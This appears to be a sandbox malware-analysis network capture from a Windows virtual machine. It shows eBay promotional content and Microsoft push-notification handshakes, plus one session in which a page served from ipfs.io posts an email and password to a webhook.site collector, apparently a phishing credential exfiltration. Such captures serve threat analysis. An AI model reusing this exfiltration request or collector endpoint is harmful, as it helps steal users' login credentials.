2025-01-14 00:48:03 UTC	1369	IN	Data Raw: 35 0d 0a 0d 0a 41 55 20 24 39 35 39 2e 39 35 20 c2 b7 20 41 55 20 24 38 34 30 2e 30 30 20 4f 46 46 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 4f 69 6b 69 74 75 72 65 20 4b 69 74 63 68 65 6e 20 49 73 6c 61 6e 64 2e 2e 2e 0d 0a 4f 69 6b 69 74 75 72 65 20 4b 69 74 63 68 65 6e 20 49 73 6c 61 6e 64 2e 2e 2e 0d 0a 41 55 20 24 31 37 30 2e 30 30 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 42 65 64 72 61 20 45 6c 65 63 74 72 69 63 20 42 6c 61 6e 6b 65 74 20 46 75 6c 6c 79 2e 2e 2e 0d 0a 42 65 64 72 61 20 45 6c 65 63 74 72 69 63 20 42 6c 61 6e 6b 65 74 20 46 75 6c 6c 79 2e 2e 2e 0d 0a 41 55 20 24 36 33 2e 30 30 0d 0a 0d 0a 41 55 20 24 37 30 2e 39 30 20 c2 b7 20 31 31 25 20 4f 46 46 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 42 6f 50 65 65 70 20 46 6f 6c 64 61 62 6c 65 20 4b 69 Data Ascii: 5AU $959.95 AU $840.00 OFFImage of Oikiture Kitchen Island...Oikiture Kitchen Island...AU $170.00Image of Bedra Electric Blanket Fully...Bedra Electric Blanket Fully...AU $63.00AU $70.90 11% OFFImage of BoPeep Foldable Ki
2025-01-14 00:48:03 UTC	1369	IN	Data Raw: 44 2e 2e 2e 0d 0a 41 5a 44 4f 4d 45 20 34 4b 20 44 61 73 68 20 43 61 6d 20 55 48 44 2e 2e 2e 0d 0a 41 55 20 24 35 35 2e 39 39 0d 0a 0d 0a 41 55 20 24 37 31 2e 39 39 20 c2 b7 20 32 32 25 20 4f 46 46 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 50 65 72 66 65 63 74 20 43 68 6f 69 63 65 20 52 65 64 20 4d 69 78 65 64 20 57 69 6e 65 73 2e 2e 2e 0d 0a 50 65 72 66 65 63 74 20 43 68 6f 69 63 65 20 52 65 64 20 4d 69 78 65 64 20 57 69 6e 65 73 2e 2e 2e 0d 0a 41 55 20 24 36 35 2e 30 30 0d 0a 0d 0a 41 55 20 24 32 33 30 2e 30 30 20 c2 b7 20 41 55 20 24 31 36 35 2e 30 30 20 4f 46 46 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 45 56 45 52 41 55 c2 ae 20 57 6f 6d 65 6e 20 4d 65 6e 20 53 6c 69 70 70 65 72 73 2e 2e 2e 0d 0a 45 56 45 52 41 55 c2 ae 20 57 6f 6d 65 6e 20 4d 65 6e 20 53 Data Ascii: D...AZDOME 4K Dash Cam UHD...AU $55.99AU $71.99 22% OFFImage of Perfect Choice Red Mixed Wines...Perfect Choice Red Mixed Wines...AU $65.00AU $230.00 AU $165.00 OFFImage of EVERAU Women Men Slippers...EVERAU Women Men S
2025-01-14 00:48:03 UTC	1369	IN	Data Raw: 76 65 2e 0d 0a 0d 0a 53 68 6f 70 20 6e 6f 77 20 0d 0a 53 61 6c 65 73 20 26 20 65 76 65 6e 74 73 0d 0a 65 42 61 79 20 4c 6f 67 6f 09 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 0d 0a 55 70 64 61 74 65 20 79 6f 75 72 20 65 6d 61 69 6c 20 70 72 65 66 65 72 65 6e 63 65 73 2c 20 75 6e 73 75 62 73 63 72 69 62 65 20 6f 72 20 6c 65 61 72 6e 20 61 62 6f 75 74 20 61 63 63 6f 75 6e 74 20 70 72 6f 74 65 63 74 69 6f 6e 2e 0d 0a 49 66 20 79 6f 75 20 68 61 76 65 20 61 20 71 75 65 73 74 69 6f 6e 2c 20 63 6f 6e 74 61 63 74 20 75 73 2e 20 65 42 61 79 20 4d e2 80 8c 61 72 6b 65 74 70 6c 61 63 65 73 20 47 e2 80 8c 6d 62 48 2c 20 48 e2 80 8c 65 6c 76 65 74 69 61 73 74 72 61 73 73 65 20 31 e2 80 8c 35 2f 31 37 2c 20 33 e2 80 8c 30 30 35 20 42 e2 Data Ascii: ve.Shop now Sales & eventseBay Logo Update your email preferences, unsubscribe or learn about account protection.If you have a question, contact us. eBay Marketplaces GmbH, Helvetiastrasse 15/17, 3005 B
2025-01-14 00:48:03 UTC	1369	IN	Data Raw: 2e 0d 0a 41 55 20 24 31 37 30 2e 30 30 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 42 65 64 72 61 20 45 6c 65 63 74 72 69 63 20 42 6c 61 6e 6b 65 74 20 46 75 6c 6c 79 2e 2e 2e 0d 0a 42 65 64 72 61 20 45 6c 65 63 74 72 69 63 20 42 6c 61 6e 6b 65 74 20 46 75 6c 6c 79 2e 2e 2e 0d 0a 41 55 20 24 36 33 2e 30 30 0d 0a 0d 0a 41 55 20 24 37 30 2e 39 30 20 c2 b7 20 31 31 25 20 4f 46 46 0d 0a 0d 0a 49 6d 61 67 65 20 6f 66 20 42 6f 50 65 65 70 20 46 6f 6c 64 61 62 6c 65 20 4b 69 64 73 20 53 63 6f 6f 74 65 72 2e 2e 2e 0d 0a 42 6f 50 65 65 70 20 46 6f 6c 64 61 62 6c 65 20 4b 69 64 73 20 53 63 6f 6f 74 65 72 2e 2e 2e 0d 0a 41 55 20 24 34 39 2e 39 39 0d 0a 0d 0a 41 55 20 24 31 30 37 2e 39 39 20 c2 b7 20 41 55 20 24 35 38 2e 30 30 20 4f 46 46 0d 0a 0d 0a 44 69 72 65 63 74 20 Data Ascii: .AU $170.00Image of Bedra Electric Blanket Fully...Bedra Electric Blanket Fully...AU $63.00AU $70.90 11% OFFImage of BoPeep Foldable Kids Scooter...BoPeep Foldable Kids Scooter...AU $49.99AU $107.99 AU $58.00 OFFDirect

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.6	49736	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:05 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4a 45 7a 50 49 74 54 6a 30 6b 4f 4a 5a 5a 68 71 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 33 31 64 35 35 36 30 30 30 66 30 61 38 66 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: JEzPItTj0kOJZZhq.1Context: 131d556000f0a8f7
2025-01-14 00:48:05 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:48:05 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4a 45 7a 50 49 74 54 6a 30 6b 4f 4a 5a 5a 68 71 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 33 31 64 35 35 36 30 30 30 66 30 61 38 66 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: JEzPItTj0kOJZZhq.2Context: 131d556000f0a8f7<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
2025-01-14 00:48:05 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 4a 45 7a 50 49 74 54 6a 30 6b 4f 4a 5a 5a 68 71 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 33 31 64 35 35 36 30 30 30 66 30 61 38 66 37 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: JEzPItTj0kOJZZhq.3Context: 131d556000f0a8f7
2025-01-14 00:48:05 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:48:05 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 4d 33 73 71 78 39 67 2b 74 6b 47 39 4b 36 34 6e 34 70 71 37 6d 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: M3sqx9g+tkG9K64n4pq7mA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.6	49756	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:07 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 70 4d 39 46 47 4c 73 68 74 6b 4f 31 6e 47 63 71 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 31 37 38 63 62 36 32 38 38 37 32 66 37 65 34 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: pM9FGLshtkO1nGcq.1Context: a178cb628872f7e4
2025-01-14 00:48:07 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:48:07 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 70 4d 39 46 47 4c 73 68 74 6b 4f 31 6e 47 63 71 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 31 37 38 63 62 36 32 38 38 37 32 66 37 65 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: pM9FGLshtkO1nGcq.2Context: a178cb628872f7e4<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
2025-01-14 00:48:07 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 70 4d 39 46 47 4c 73 68 74 6b 4f 31 6e 47 63 71 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 31 37 38 63 62 36 32 38 38 37 32 66 37 65 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: pM9FGLshtkO1nGcq.3Context: a178cb628872f7e4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 00:48:07 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:48:07 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 6a 2f 42 38 42 64 7a 2b 7a 6b 53 42 50 4e 4a 36 4f 37 4c 54 6a 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: j/B8Bdz+zkSBPNJ6O7LTjQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.6	49800	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:13 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 41 54 31 35 5a 66 4a 59 45 53 78 6a 4f 63 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 65 37 30 35 39 32 35 31 38 35 33 38 63 61 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: bAT15ZfJYESxjOcu.1Context: 7de70592518538ca
2025-01-14 00:48:13 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:48:13 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 41 54 31 35 5a 66 4a 59 45 53 78 6a 4f 63 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 65 37 30 35 39 32 35 31 38 35 33 38 63 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: bAT15ZfJYESxjOcu.2Context: 7de70592518538ca<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
2025-01-14 00:48:13 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 62 41 54 31 35 5a 66 4a 59 45 53 78 6a 4f 63 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 65 37 30 35 39 32 35 31 38 35 33 38 63 61 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: bAT15ZfJYESxjOcu.3Context: 7de70592518538ca
2025-01-14 00:48:14 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:48:14 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 79 63 38 43 64 4b 2f 43 4c 55 6d 77 37 35 56 43 4c 6a 38 34 47 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: yc8CdK/CLUmw75VCLj84Gg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49830	178.63.67.153	443	5264	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:18 UTC	688	OUT	POST /87f659f6-075d-4e0e-b197-649a09850ad0 HTTP/1.1 Host: webhook.site Connection: keep-alive Content-Length: 55 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://ipfs.io Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 00:48:18 UTC	55	OUT	Data Raw: 74 65 6d 61 69 6c 3d 6b 6b 37 6c 66 30 25 34 30 78 73 6a 63 6a 72 65 2e 63 6f 6d 26 74 70 61 73 73 3d 56 30 67 56 25 33 41 77 2e 25 33 42 65 31 30 56 45 5a 56 56 58 Data Ascii: temail=kk7lf0%40xsjcjre.com&tpass=V0gV%3Aw.%3Be10VEZVVX
2025-01-14 00:48:18 UTC	294	IN	HTTP/1.1 200 OK server: nginx content-type: text/html; charset=UTF-8 transfer-encoding: chunked x-request-id: 81b714d6-38dd-4bbd-981b-e36f9def592d x-token-id: 87f659f6-075d-4e0e-b197-649a09850ad0 cache-control: no-cache, private date: Tue, 14 Jan 2025 00:48:18 GMT connection: close
2025-01-14 00:48:18 UTC	156	IN	Data Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 38 37 66 36 35 39 66 36 2d 30 37 35 64 2d 34 65 30 65 2d 62 31 39 37 2d 36 34 39 61 30 39 38 35 30 61 64 30 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/87f659f6-075d-4e0e-b197-649a09850ad0">View in Webhook.site</a>.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.6	49840	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:19 UTC	70	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 35 58 4f 52 55 46 6f 68 76 6b 4f 34 46 58 72 34 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 35 65 65 34 66 37 62 32 38 35 66 66 30 62 0d 0a 0d 0a Data Ascii: CNT 1 CON 304MS-CV: 5XORUFohvkO4FXr4.1Context: 35ee4f7b285ff0b
2025-01-14 00:48:19 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:48:19 UTC	1083	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 35 58 4f 52 55 46 6f 68 76 6b 4f 34 46 58 72 34 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 35 65 65 34 66 37 62 32 38 35 66 66 30 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f 47 Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: 5XORUFohvkO4FXr4.2Context: 35ee4f7b285ff0b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6oG
2025-01-14 00:48:19 UTC	217	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 35 58 4f 52 55 46 6f 68 76 6b 4f 34 46 58 72 34 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 35 65 65 34 66 37 62 32 38 35 66 66 30 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 196MS-CV: 5XORUFohvkO4FXr4.3Context: 35ee4f7b285ff0b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 00:48:19 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:48:19 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 50 33 45 39 38 68 70 58 36 30 36 57 37 68 35 4f 5a 6a 42 66 2f 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: P3E98hpX606W7h5OZjBf/w.0Payload parsing failed.

